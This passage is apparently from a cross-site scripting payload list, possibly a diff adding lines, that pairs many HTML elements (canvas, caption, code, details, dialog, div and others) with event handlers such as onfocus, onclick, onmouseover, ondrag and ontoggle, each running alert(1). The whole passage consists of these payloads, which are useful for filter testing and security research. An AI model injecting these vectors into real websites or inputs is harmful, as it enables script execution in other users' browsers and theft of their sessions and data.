id=x tabindex=1 onbeforedeactivate=alert(1)></canvas><input autofocus> +<canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus> +<canvas id=x tabindex=1 onfocus=alert(1)></canvas> +<canvas id=x tabindex=1 onfocusin=alert(1)></canvas> +<canvas onbeforecopy="alert(1)" contenteditable>test</canvas> +<canvas onbeforecut="alert(1)" contenteditable>test</canvas> +<canvas onbeforepaste="alert(1)" contenteditable>test</canvas> +<canvas onblur=alert(1) tabindex=1 id=x></canvas><input autofocus> +<canvas onclick="alert(1)">test</canvas> +<canvas oncontextmenu="alert(1)">test</canvas> +<canvas oncopy="alert(1)" contenteditable>test</canvas> +<canvas oncut="alert(1)" contenteditable>test</canvas> +<canvas ondblclick="alert(1)">test</canvas> +<canvas onfocusout=alert(1) tabindex=1 id=x></canvas><input autofocus> +<canvas onkeydown="alert(1)" contenteditable>test</canvas> +<canvas onkeypress="alert(1)" contenteditable>test</canvas> +<canvas onkeyup="alert(1)" contenteditable>test</canvas> +<canvas onmousedown="alert(1)">test</canvas> +<canvas onmouseenter="alert(1)">test</canvas> +<canvas onmouseleave="alert(1)">test</canvas> +<canvas onmousemove="alert(1)">test</canvas> +<canvas onmouseout="alert(1)">test</canvas> +<canvas onmouseover="alert(1)">test</canvas> +<canvas onmouseup="alert(1)">test</canvas> +<canvas onpaste="alert(1)" contenteditable>test</canvas> +<caption draggable="true" ondrag="alert(1)">test</caption> +<caption draggable="true" ondragend="alert(1)">test</caption> +<caption draggable="true" ondragenter="alert(1)">test</caption> +<caption draggable="true" ondragleave="alert(1)">test</caption> +<caption draggable="true" ondragstart="alert(1)">test</caption> +<caption id=x tabindex=1 onactivate=alert(1)></caption> +<caption id=x tabindex=1 onbeforeactivate=alert(1)></caption> +<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus> +<caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus> +<caption id=x tabindex=1 onfocus=alert(1)></caption> +<caption id=x tabindex=1 onfocusin=alert(1)></caption> +<caption onbeforecopy="alert(1)" contenteditable>test</caption> +<caption onbeforecut="alert(1)" contenteditable>test</caption> +<caption onbeforepaste="alert(1)" contenteditable>test</caption> +<caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus> +<caption onclick="alert(1)">test</caption> +<caption oncontextmenu="alert(1)">test</caption> +<caption oncopy="alert(1)" contenteditable>test</caption> +<caption oncut="alert(1)" contenteditable>test</caption> +<caption ondblclick="alert(1)">test</caption> +<caption onfocusout=alert(1) tabindex=1 id=x></caption><input autofocus> +<caption onkeydown="alert(1)" contenteditable>test</caption> +<caption onkeypress="alert(1)" contenteditable>test</caption> +<caption onkeyup="alert(1)" contenteditable>test</caption> +<caption onmousedown="alert(1)">test</caption> +<caption onmouseenter="alert(1)">test</caption> +<caption onmouseleave="alert(1)">test</caption> +<caption onmousemove="alert(1)">test</caption> +<caption onmouseout="alert(1)">test</caption> +<caption onmouseover="alert(1)">test</caption> +<caption onmouseup="alert(1)">test</caption> +<caption onpaste="alert(1)" contenteditable>test</caption> +<center draggable="true" ondrag="alert(1)">test</center> +<center draggable="true" ondragend="alert(1)">test</center> +<center draggable="true" ondragenter="alert(1)">test</center> +<center draggable="true" ondragleave="alert(1)">test</center> +<center draggable="true" ondragstart="alert(1)">test</center> +<center id=x tabindex=1 onactivate=alert(1)></center> +<center id=x tabindex=1 onbeforeactivate=alert(1)></center> +<center id=x tabindex=1 onbeforedeactivate=alert(1)></center><input autofocus> +<center id=x tabindex=1 ondeactivate=alert(1)></center><input id=y autofocus> +<center id=x tabindex=1 onfocus=alert(1)></center> +<center id=x tabindex=1 onfocusin=alert(1)></center> +<center onbeforecopy="alert(1)" contenteditable>test</center> +<center onbeforecut="alert(1)" contenteditable>test</center> +<center onbeforepaste="alert(1)" contenteditable>test</center> +<center onblur=alert(1) tabindex=1 id=x></center><input autofocus> +<center onclick="alert(1)">test</center> +<center oncontextmenu="alert(1)">test</center> +<center oncopy="alert(1)" contenteditable>test</center> +<center oncut="alert(1)" contenteditable>test</center> +<center ondblclick="alert(1)">test</center> +<center onfocusout=alert(1) tabindex=1 id=x></center><input autofocus> +<center onkeydown="alert(1)" contenteditable>test</center> +<center onkeypress="alert(1)" contenteditable>test</center> +<center onkeyup="alert(1)" contenteditable>test</center> +<center onmousedown="alert(1)">test</center> +<center onmouseenter="alert(1)">test</center> +<center onmouseleave="alert(1)">test</center> +<center onmousemove="alert(1)">test</center> +<center onmouseout="alert(1)">test</center> +<center onmouseover="alert(1)">test</center> +<center onmouseup="alert(1)">test</center> +<center onpaste="alert(1)" contenteditable>test</center> +<cite draggable="true" ondrag="alert(1)">test</cite> +<cite draggable="true" ondragend="alert(1)">test</cite> +<cite draggable="true" ondragenter="alert(1)">test</cite> +<cite draggable="true" ondragleave="alert(1)">test</cite> +<cite draggable="true" ondragstart="alert(1)">test</cite> +<cite id=x tabindex=1 onactivate=alert(1)></cite> +<cite id=x tabindex=1 onbeforeactivate=alert(1)></cite> +<cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus> +<cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus> +<cite id=x tabindex=1 onfocus=alert(1)></cite> +<cite id=x tabindex=1 onfocusin=alert(1)></cite> +<cite onbeforecopy="alert(1)" contenteditable>test</cite> +<cite onbeforecut="alert(1)" contenteditable>test</cite> +<cite onbeforepaste="alert(1)" contenteditable>test</cite> +<cite onblur=alert(1) tabindex=1 id=x></cite><input autofocus> +<cite onclick="alert(1)">test</cite> +<cite oncontextmenu="alert(1)">test</cite> +<cite oncopy="alert(1)" contenteditable>test</cite> +<cite oncut="alert(1)" contenteditable>test</cite> +<cite ondblclick="alert(1)">test</cite> +<cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus> +<cite onkeydown="alert(1)" contenteditable>test</cite> +<cite onkeypress="alert(1)" contenteditable>test</cite> +<cite onkeyup="alert(1)" contenteditable>test</cite> +<cite onmousedown="alert(1)">test</cite> +<cite onmouseenter="alert(1)">test</cite> +<cite onmouseleave="alert(1)">test</cite> +<cite onmousemove="alert(1)">test</cite> +<cite onmouseout="alert(1)">test</cite> +<cite onmouseover="alert(1)">test</cite> +<cite onmouseup="alert(1)">test</cite> +<cite onpaste="alert(1)" contenteditable>test</cite> +<code draggable="true" ondrag="alert(1)">test</code> +<code draggable="true" ondragend="alert(1)">test</code> +<code draggable="true" ondragenter="alert(1)">test</code> +<code draggable="true" ondragleave="alert(1)">test</code> +<code draggable="true" ondragstart="alert(1)">test</code> +<code id=x tabindex=1 onactivate=alert(1)></code> +<code id=x tabindex=1 onbeforeactivate=alert(1)></code> +<code id=x tabindex=1 onbeforedeactivate=alert(1)></code><input autofocus> +<code id=x tabindex=1 ondeactivate=alert(1)></code><input id=y autofocus> +<code id=x tabindex=1 onfocus=alert(1)></code> +<code id=x tabindex=1 onfocusin=alert(1)></code> +<code onbeforecopy="alert(1)" contenteditable>test</code> +<code onbeforecut="alert(1)" contenteditable>test</code> +<code onbeforepaste="alert(1)" contenteditable>test</code> +<code onblur=alert(1) tabindex=1 id=x></code><input autofocus> +<code onclick="alert(1)">test</code> +<code oncontextmenu="alert(1)">test</code> +<code oncopy="alert(1)" contenteditable>test</code> +<code oncut="alert(1)" contenteditable>test</code> +<code ondblclick="alert(1)">test</code> +<code onfocusout=alert(1) tabindex=1 id=x></code><input autofocus> +<code onkeydown="alert(1)" contenteditable>test</code> +<code onkeypress="alert(1)" contenteditable>test</code> +<code onkeyup="alert(1)" contenteditable>test</code> +<code onmousedown="alert(1)">test</code> +<code onmouseenter="alert(1)">test</code> +<code onmouseleave="alert(1)">test</code> +<code onmousemove="alert(1)">test</code> +<code onmouseout="alert(1)">test</code> +<code onmouseover="alert(1)">test</code> +<code onmouseup="alert(1)">test</code> +<code onpaste="alert(1)" contenteditable>test</code> +<col draggable="true" ondrag="alert(1)">test</col> +<col draggable="true" ondragend="alert(1)">test</col> +<col draggable="true" ondragenter="alert(1)">test</col> +<col draggable="true" ondragleave="alert(1)">test</col> +<col draggable="true" ondragstart="alert(1)">test</col> +<col id=x tabindex=1 onactivate=alert(1)></col> +<col id=x tabindex=1 onbeforeactivate=alert(1)></col> +<col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus> +<col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus> +<col id=x tabindex=1 onfocus=alert(1)></col> +<col id=x tabindex=1 onfocusin=alert(1)></col> +<col onbeforecopy="alert(1)" contenteditable>test</col> +<col onbeforecut="alert(1)" contenteditable>test</col> +<col onbeforepaste="alert(1)" contenteditable>test</col> +<col onblur=alert(1) tabindex=1 id=x></col><input autofocus> +<col onclick="alert(1)">test</col> +<col oncontextmenu="alert(1)">test</col> +<col oncopy="alert(1)" contenteditable>test</col> +<col oncut="alert(1)" contenteditable>test</col> +<col ondblclick="alert(1)">test</col> +<col onfocusout=alert(1) tabindex=1 id=x></col><input autofocus> +<col onkeydown="alert(1)" contenteditable>test</col> +<col onkeypress="alert(1)" contenteditable>test</col> +<col onkeyup="alert(1)" contenteditable>test</col> +<col onmousedown="alert(1)">test</col> +<col onmouseenter="alert(1)">test</col> +<col onmouseleave="alert(1)">test</col> +<col onmousemove="alert(1)">test</col> +<col onmouseout="alert(1)">test</col> +<col onmouseover="alert(1)">test</col> +<col onmouseup="alert(1)">test</col> +<col onpaste="alert(1)" contenteditable>test</col> +<colgroup draggable="true" ondrag="alert(1)">test</colgroup> +<colgroup draggable="true" ondragend="alert(1)">test</colgroup> +<colgroup draggable="true" ondragenter="alert(1)">test</colgroup> +<colgroup draggable="true" ondragleave="alert(1)">test</colgroup> +<colgroup draggable="true" ondragstart="alert(1)">test</colgroup> +<colgroup id=x tabindex=1 onactivate=alert(1)></colgroup> +<colgroup id=x tabindex=1 onbeforeactivate=alert(1)></colgroup> +<colgroup id=x tabindex=1 onbeforedeactivate=alert(1)></colgroup><input autofocus> +<colgroup id=x tabindex=1 ondeactivate=alert(1)></colgroup><input id=y autofocus> +<colgroup id=x tabindex=1 onfocus=alert(1)></colgroup> +<colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup> +<colgroup onbeforecopy="alert(1)" contenteditable>test</colgroup> +<colgroup onbeforecut="alert(1)" contenteditable>test</colgroup> +<colgroup onbeforepaste="alert(1)" contenteditable>test</colgroup> +<colgroup onblur=alert(1) tabindex=1 id=x></colgroup><input autofocus> +<colgroup onclick="alert(1)">test</colgroup> +<colgroup oncontextmenu="alert(1)">test</colgroup> +<colgroup oncopy="alert(1)" contenteditable>test</colgroup> +<colgroup oncut="alert(1)" contenteditable>test</colgroup> +<colgroup ondblclick="alert(1)">test</colgroup> +<colgroup onfocusout=alert(1) tabindex=1 id=x></colgroup><input autofocus> +<colgroup onkeydown="alert(1)" contenteditable>test</colgroup> +<colgroup onkeypress="alert(1)" contenteditable>test</colgroup> +<colgroup onkeyup="alert(1)" contenteditable>test</colgroup> +<colgroup onmousedown="alert(1)">test</colgroup> +<colgroup onmouseenter="alert(1)">test</colgroup> +<colgroup onmouseleave="alert(1)">test</colgroup> +<colgroup onmousemove="alert(1)">test</colgroup> +<colgroup onmouseout="alert(1)">test</colgroup> +<colgroup onmouseover="alert(1)">test</colgroup> +<colgroup onmouseup="alert(1)">test</colgroup> +<colgroup onpaste="alert(1)" contenteditable>test</colgroup> +<command draggable="true" ondrag="alert(1)">test</command> +<command draggable="true" ondragend="alert(1)">test</command> +<command draggable="true" ondragenter="alert(1)">test</command> +<command draggable="true" ondragleave="alert(1)">test</command> +<command draggable="true" ondragstart="alert(1)">test</command> +<command id=x tabindex=1 onactivate=alert(1)></command> +<command id=x tabindex=1 onbeforeactivate=alert(1)></command> +<command id=x tabindex=1 onbeforedeactivate=alert(1)></command><input autofocus> +<command id=x tabindex=1 ondeactivate=alert(1)></command><input id=y autofocus> +<command id=x tabindex=1 onfocus=alert(1)></command> +<command id=x tabindex=1 onfocusin=alert(1)></command> +<command onbeforecopy="alert(1)" contenteditable>test</command> +<command onbeforecut="alert(1)" contenteditable>test</command> +<command onbeforepaste="alert(1)" contenteditable>test</command> +<command onblur=alert(1) tabindex=1 id=x></command><input autofocus> +<command onclick="alert(1)">test</command> +<command oncontextmenu="alert(1)">test</command> +<command oncopy="alert(1)" contenteditable>test</command> +<command oncut="alert(1)" contenteditable>test</command> +<command ondblclick="alert(1)">test</command> +<command onfocusout=alert(1) tabindex=1 id=x></command><input autofocus> +<command onkeydown="alert(1)" contenteditable>test</command> +<command onkeypress="alert(1)" contenteditable>test</command> +<command onkeyup="alert(1)" contenteditable>test</command> +<command onmousedown="alert(1)">test</command> +<command onmouseenter="alert(1)">test</command> +<command onmouseleave="alert(1)">test</command> +<command onmousemove="alert(1)">test</command> +<command onmouseout="alert(1)">test</command> +<command onmouseover="alert(1)">test</command> +<command onmouseup="alert(1)">test</command> +<command onpaste="alert(1)" contenteditable>test</command> +<content draggable="true" ondrag="alert(1)">test</content> +<content draggable="true" ondragend="alert(1)">test</content> +<content draggable="true" ondragenter="alert(1)">test</content> +<content draggable="true" ondragleave="alert(1)">test</content> +<content draggable="true" ondragstart="alert(1)">test</content> +<content id=x tabindex=1 onactivate=alert(1)></content> +<content id=x tabindex=1 onbeforeactivate=alert(1)></content> +<content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus> +<content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus> +<content id=x tabindex=1 onfocus=alert(1)></content> +<content id=x tabindex=1 onfocusin=alert(1)></content> +<content onbeforecopy="alert(1)" contenteditable>test</content> +<content onbeforecut="alert(1)" contenteditable>test</content> +<content onbeforepaste="alert(1)" contenteditable>test</content> +<content onblur=alert(1) tabindex=1 id=x></content><input autofocus> +<content onclick="alert(1)">test</content> +<content oncontextmenu="alert(1)">test</content> +<content oncopy="alert(1)" contenteditable>test</content> +<content oncut="alert(1)" contenteditable>test</content> +<content ondblclick="alert(1)">test</content> +<content onfocusout=alert(1) tabindex=1 id=x></content><input autofocus> +<content onkeydown="alert(1)" contenteditable>test</content> +<content onkeypress="alert(1)" contenteditable>test</content> +<content onkeyup="alert(1)" contenteditable>test</content> +<content onmousedown="alert(1)">test</content> +<content onmouseenter="alert(1)">test</content> +<content onmouseleave="alert(1)">test</content> +<content onmousemove="alert(1)">test</content> +<content onmouseout="alert(1)">test</content> +<content onmouseover="alert(1)">test</content> +<content onmouseup="alert(1)">test</content> +<content onpaste="alert(1)" contenteditable>test</content> +<data draggable="true" ondrag="alert(1)">test</data> +<data draggable="true" ondragend="alert(1)">test</data> +<data draggable="true" ondragenter="alert(1)">test</data> +<data draggable="true" ondragleave="alert(1)">test</data> +<data draggable="true" ondragstart="alert(1)">test</data> +<data id=x tabindex=1 onactivate=alert(1)></data> +<data id=x tabindex=1 onbeforeactivate=alert(1)></data> +<data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus> +<data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus> +<data id=x tabindex=1 onfocus=alert(1)></data> +<data id=x tabindex=1 onfocusin=alert(1)></data> +<data onbeforecopy="alert(1)" contenteditable>test</data> +<data onbeforecut="alert(1)" contenteditable>test</data> +<data onbeforepaste="alert(1)" contenteditable>test</data> +<data onblur=alert(1) tabindex=1 id=x></data><input autofocus> +<data onclick="alert(1)">test</data> +<data oncontextmenu="alert(1)">test</data> +<data oncopy="alert(1)" contenteditable>test</data> +<data oncut="alert(1)" contenteditable>test</data> +<data ondblclick="alert(1)">test</data> +<data onfocusout=alert(1) tabindex=1 id=x></data><input autofocus> +<data onkeydown="alert(1)" contenteditable>test</data> +<data onkeypress="alert(1)" contenteditable>test</data> +<data onkeyup="alert(1)" contenteditable>test</data> +<data onmousedown="alert(1)">test</data> +<data onmouseenter="alert(1)">test</data> +<data onmouseleave="alert(1)">test</data> +<data onmousemove="alert(1)">test</data> +<data onmouseout="alert(1)">test</data> +<data onmouseover="alert(1)">test</data> +<data onmouseup="alert(1)">test</data> +<data onpaste="alert(1)" contenteditable>test</data> +<datalist draggable="true" ondrag="alert(1)">test</datalist> +<datalist draggable="true" ondragend="alert(1)">test</datalist> +<datalist draggable="true" ondragenter="alert(1)">test</datalist> +<datalist draggable="true" ondragleave="alert(1)">test</datalist> +<datalist draggable="true" ondragstart="alert(1)">test</datalist> +<datalist id=x tabindex=1 onactivate=alert(1)></datalist> +<datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist> +<datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus> +<datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus> +<datalist id=x tabindex=1 onfocus=alert(1)></datalist> +<datalist id=x tabindex=1 onfocusin=alert(1)></datalist> +<datalist onbeforecopy="alert(1)" contenteditable>test</datalist> +<datalist onbeforecut="alert(1)" contenteditable>test</datalist> +<datalist onbeforepaste="alert(1)" contenteditable>test</datalist> +<datalist onblur=alert(1) tabindex=1 id=x></datalist><input autofocus> +<datalist onclick="alert(1)">test</datalist> +<datalist oncontextmenu="alert(1)">test</datalist> +<datalist oncopy="alert(1)" contenteditable>test</datalist> +<datalist oncut="alert(1)" contenteditable>test</datalist> +<datalist ondblclick="alert(1)">test</datalist> +<datalist onfocusout=alert(1) tabindex=1 id=x></datalist><input autofocus> +<datalist onkeydown="alert(1)" contenteditable>test</datalist> +<datalist onkeypress="alert(1)" contenteditable>test</datalist> +<datalist onkeyup="alert(1)" contenteditable>test</datalist> +<datalist onmousedown="alert(1)">test</datalist> +<datalist onmouseenter="alert(1)">test</datalist> +<datalist onmouseleave="alert(1)">test</datalist> +<datalist onmousemove="alert(1)">test</datalist> +<datalist onmouseout="alert(1)">test</datalist> +<datalist onmouseover="alert(1)">test</datalist> +<datalist onmouseup="alert(1)">test</datalist> +<datalist onpaste="alert(1)" contenteditable>test</datalist> +<dd draggable="true" ondrag="alert(1)">test</dd> +<dd draggable="true" ondragend="alert(1)">test</dd> +<dd draggable="true" ondragenter="alert(1)">test</dd> +<dd draggable="true" ondragleave="alert(1)">test</dd> +<dd draggable="true" ondragstart="alert(1)">test</dd> +<dd id=x tabindex=1 onactivate=alert(1)></dd> +<dd id=x tabindex=1 onbeforeactivate=alert(1)></dd> +<dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus> +<dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus> +<dd id=x tabindex=1 onfocus=alert(1)></dd> +<dd id=x tabindex=1 onfocusin=alert(1)></dd> +<dd onbeforecopy="alert(1)" contenteditable>test</dd> +<dd onbeforecut="alert(1)" contenteditable>test</dd> +<dd onbeforepaste="alert(1)" contenteditable>test</dd> +<dd onblur=alert(1) tabindex=1 id=x></dd><input autofocus> +<dd onclick="alert(1)">test</dd> +<dd oncontextmenu="alert(1)">test</dd> +<dd oncopy="alert(1)" contenteditable>test</dd> +<dd oncut="alert(1)" contenteditable>test</dd> +<dd ondblclick="alert(1)">test</dd> +<dd onfocusout=alert(1) tabindex=1 id=x></dd><input autofocus> +<dd onkeydown="alert(1)" contenteditable>test</dd> +<dd onkeypress="alert(1)" contenteditable>test</dd> +<dd onkeyup="alert(1)" contenteditable>test</dd> +<dd onmousedown="alert(1)">test</dd> +<dd onmouseenter="alert(1)">test</dd> +<dd onmouseleave="alert(1)">test</dd> +<dd onmousemove="alert(1)">test</dd> +<dd onmouseout="alert(1)">test</dd> +<dd onmouseover="alert(1)">test</dd> +<dd onmouseup="alert(1)">test</dd> +<dd onpaste="alert(1)" contenteditable>test</dd> +<del draggable="true" ondrag="alert(1)">test</del> +<del draggable="true" ondragend="alert(1)">test</del> +<del draggable="true" ondragenter="alert(1)">test</del> +<del draggable="true" ondragleave="alert(1)">test</del> +<del draggable="true" ondragstart="alert(1)">test</del> +<del id=x tabindex=1 onactivate=alert(1)></del> +<del id=x tabindex=1 onbeforeactivate=alert(1)></del> +<del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus> +<del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus> +<del id=x tabindex=1 onfocus=alert(1)></del> +<del id=x tabindex=1 onfocusin=alert(1)></del> +<del onbeforecopy="alert(1)" contenteditable>test</del> +<del onbeforecut="alert(1)" contenteditable>test</del> +<del onbeforepaste="alert(1)" contenteditable>test</del> +<del onblur=alert(1) tabindex=1 id=x></del><input autofocus> +<del onclick="alert(1)">test</del> +<del oncontextmenu="alert(1)">test</del> +<del oncopy="alert(1)" contenteditable>test</del> +<del oncut="alert(1)" contenteditable>test</del> +<del ondblclick="alert(1)">test</del> +<del onfocusout=alert(1) tabindex=1 id=x></del><input autofocus> +<del onkeydown="alert(1)" contenteditable>test</del> +<del onkeypress="alert(1)" contenteditable>test</del> +<del onkeyup="alert(1)" contenteditable>test</del> +<del onmousedown="alert(1)">test</del> +<del onmouseenter="alert(1)">test</del> +<del onmouseleave="alert(1)">test</del> +<del onmousemove="alert(1)">test</del> +<del onmouseout="alert(1)">test</del> +<del onmouseover="alert(1)">test</del> +<del onmouseup="alert(1)">test</del> +<del onpaste="alert(1)" contenteditable>test</del> +<details draggable="true" ondrag="alert(1)">test</details> +<details draggable="true" ondragend="alert(1)">test</details> +<details draggable="true" ondragenter="alert(1)">test</details> +<details draggable="true" ondragleave="alert(1)">test</details> +<details draggable="true" ondragstart="alert(1)">test</details> +<details id=x tabindex=1 onactivate=alert(1)></details> +<details id=x tabindex=1 onbeforeactivate=alert(1)></details> +<details id=x tabindex=1 onbeforedeactivate=alert(1)></details><input autofocus> +<details id=x tabindex=1 ondeactivate=alert(1)></details><input id=y autofocus> +<details id=x tabindex=1 onfocus=alert(1)></details> +<details id=x tabindex=1 onfocusin=alert(1)></details> +<details onbeforecopy="alert(1)" contenteditable>test</details> +<details onbeforecut="alert(1)" contenteditable>test</details> +<details onbeforepaste="alert(1)" contenteditable>test</details> +<details onblur=alert(1) tabindex=1 id=x></details><input autofocus> +<details onclick="alert(1)">test</details> +<details oncontextmenu="alert(1)">test</details> +<details oncopy="alert(1)" contenteditable>test</details> +<details oncut="alert(1)" contenteditable>test</details> +<details ondblclick="alert(1)">test</details> +<details onfocusout=alert(1) tabindex=1 id=x></details><input autofocus> +<details onkeydown="alert(1)" contenteditable>test</details> +<details onkeypress="alert(1)" contenteditable>test</details> +<details onkeyup="alert(1)" contenteditable>test</details> +<details onmousedown="alert(1)">test</details> +<details onmouseenter="alert(1)">test</details> +<details onmouseleave="alert(1)">test</details> +<details onmousemove="alert(1)">test</details> +<details onmouseout="alert(1)">test</details> +<details onmouseover="alert(1)">test</details> +<details onmouseup="alert(1)">test</details> +<details onpaste="alert(1)" contenteditable>test</details> +<details ontoggle=alert(1) open>test</details> +<dfn draggable="true" ondrag="alert(1)">test</dfn> +<dfn draggable="true" ondragend="alert(1)">test</dfn> +<dfn draggable="true" ondragenter="alert(1)">test</dfn> +<dfn draggable="true" ondragleave="alert(1)">test</dfn> +<dfn draggable="true" ondragstart="alert(1)">test</dfn> +<dfn id=x tabindex=1 onactivate=alert(1)></dfn> +<dfn id=x tabindex=1 onbeforeactivate=alert(1)></dfn> +<dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus> +<dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><input id=y autofocus> +<dfn id=x tabindex=1 onfocus=alert(1)></dfn> +<dfn id=x tabindex=1 onfocusin=alert(1)></dfn> +<dfn onbeforecopy="alert(1)" contenteditable>test</dfn> +<dfn onbeforecut="alert(1)" contenteditable>test</dfn> +<dfn onbeforepaste="alert(1)" contenteditable>test</dfn> +<dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus> +<dfn onclick="alert(1)">test</dfn> +<dfn oncontextmenu="alert(1)">test</dfn> +<dfn oncopy="alert(1)" contenteditable>test</dfn> +<dfn oncut="alert(1)" contenteditable>test</dfn> +<dfn ondblclick="alert(1)">test</dfn> +<dfn onfocusout=alert(1) tabindex=1 id=x></dfn><input autofocus> +<dfn onkeydown="alert(1)" contenteditable>test</dfn> +<dfn onkeypress="alert(1)" contenteditable>test</dfn> +<dfn onkeyup="alert(1)" contenteditable>test</dfn> +<dfn onmousedown="alert(1)">test</dfn> +<dfn onmouseenter="alert(1)">test</dfn> +<dfn onmouseleave="alert(1)">test</dfn> +<dfn onmousemove="alert(1)">test</dfn> +<dfn onmouseout="alert(1)">test</dfn> +<dfn onmouseover="alert(1)">test</dfn> +<dfn onmouseup="alert(1)">test</dfn> +<dfn onpaste="alert(1)" contenteditable>test</dfn> +<dialog draggable="true" ondrag="alert(1)">test</dialog> +<dialog draggable="true" ondragend="alert(1)">test</dialog> +<dialog draggable="true" ondragenter="alert(1)">test</dialog> +<dialog draggable="true" ondragleave="alert(1)">test</dialog> +<dialog draggable="true" ondragstart="alert(1)">test</dialog> +<dialog id=x tabindex=1 onactivate=alert(1)></dialog> +<dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog> +<dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus> +<dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus> +<dialog id=x tabindex=1 onfocus=alert(1)></dialog> +<dialog id=x tabindex=1 onfocusin=alert(1)></dialog> +<dialog onbeforecopy="alert(1)" contenteditable>test</dialog> +<dialog onbeforecut="alert(1)" contenteditable>test</dialog> +<dialog onbeforepaste="alert(1)" contenteditable>test</dialog> +<dialog onblur=alert(1) tabindex=1 id=x></dialog><input autofocus> +<dialog onclick="alert(1)">test</dialog> +<dialog oncontextmenu="alert(1)">test</dialog> +<dialog oncopy="alert(1)" contenteditable>test</dialog> +<dialog oncut="alert(1)" contenteditable>test</dialog> +<dialog ondblclick="alert(1)">test</dialog> +<dialog onfocusout=alert(1) tabindex=1 id=x></dialog><input autofocus> +<dialog onkeydown="alert(1)" contenteditable>test</dialog> +<dialog onkeypress="alert(1)" contenteditable>test</dialog> +<dialog onkeyup="alert(1)" contenteditable>test</dialog> +<dialog onmousedown="alert(1)">test</dialog> +<dialog onmouseenter="alert(1)">test</dialog> +<dialog onmouseleave="alert(1)">test</dialog> +<dialog onmousemove="alert(1)">test</dialog> +<dialog onmouseout="alert(1)">test</dialog> +<dialog onmouseover="alert(1)">test</dialog> +<dialog onmouseup="alert(1)">test</dialog> +<dialog onpaste="alert(1)" contenteditable>test</dialog> +<dir draggable="true" ondrag="alert(1)">test</dir> +<dir draggable="true" ondragend="alert(1)">test</dir> +<dir draggable="true" ondragenter="alert(1)">test</dir> +<dir draggable="true" ondragleave="alert(1)">test</dir> +<dir draggable="true" ondragstart="alert(1)">test</dir> +<dir id=x tabindex=1 onactivate=alert(1)></dir> +<dir id=x tabindex=1 onbeforeactivate=alert(1)></dir> +<dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus> +<dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus> +<dir id=x tabindex=1 onfocus=alert(1)></dir> +<dir id=x tabindex=1 onfocusin=alert(1)></dir> +<dir onbeforecopy="alert(1)" contenteditable>test</dir> +<dir onbeforecut="alert(1)" contenteditable>test</dir> +<dir onbeforepaste="alert(1)" contenteditable>test</dir> +<dir onblur=alert(1) tabindex=1 id=x></dir><input autofocus> +<dir onclick="alert(1)">test</dir> +<dir oncontextmenu="alert(1)">test</dir> +<dir oncopy="alert(1)" contenteditable>test</dir> +<dir oncut="alert(1)" contenteditable>test</dir> +<dir ondblclick="alert(1)">test</dir> +<dir onfocusout=alert(1) tabindex=1 id=x></dir><input autofocus> +<dir onkeydown="alert(1)" contenteditable>test</dir> +<dir onkeypress="alert(1)" contenteditable>test</dir> +<dir onkeyup="alert(1)" contenteditable>test</dir> +<dir onmousedown="alert(1)">test</dir> +<dir onmouseenter="alert(1)">test</dir> +<dir onmouseleave="alert(1)">test</dir> +<dir onmousemove="alert(1)">test</dir> +<dir onmouseout="alert(1)">test</dir> +<dir onmouseover="alert(1)">test</dir> +<dir onmouseup="alert(1)">test</dir> +<dir onpaste="alert(1)" contenteditable>test</dir> +<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a> +<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a> +<div draggable="true" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr> +<div draggable="true" contenteditable>drag me</div><abbr ondrop=alert(1) contenteditable>drop here</abbr> +<div draggable="true" contenteditable>drag me</div><acronym ondragover=alert(1) contenteditable>drop here</acronym> +<div draggable="true" contenteditable>drag me</div><acronym ondrop=alert(1) contenteditable>drop here</acronym> +<div draggable="true" contenteditable>drag me</div><address ondragover=alert(1) contenteditable>drop here</address> +<div draggable="true" contenteditable>drag me</div><address ondrop=alert(1) contenteditable>drop here</address> +<div draggable="true" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet> +<div draggable="true" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet> +<div draggable="true" contenteditable>drag me</div><area ondragover=alert(1) contenteditable>drop here</area> +<div draggable="true" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area> +<div draggable="true" contenteditable>drag me</div><article ondragover=alert(1) contenteditable>drop here</article> +<div draggable="true" contenteditable>drag me</div><article ondrop=alert(1) contenteditable>drop here</article> +<div draggable="true" contenteditable>drag me</div><aside ondragover=alert(1) contenteditable>drop here</aside> +<div draggable="true" contenteditable>drag me</div><aside ondrop=alert(1) contenteditable>drop here</aside> +<div draggable="true" contenteditable>drag me</div><audio ondragover=alert(1) contenteditable>drop here</audio> +<div draggable="true" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio> +<div draggable="true" 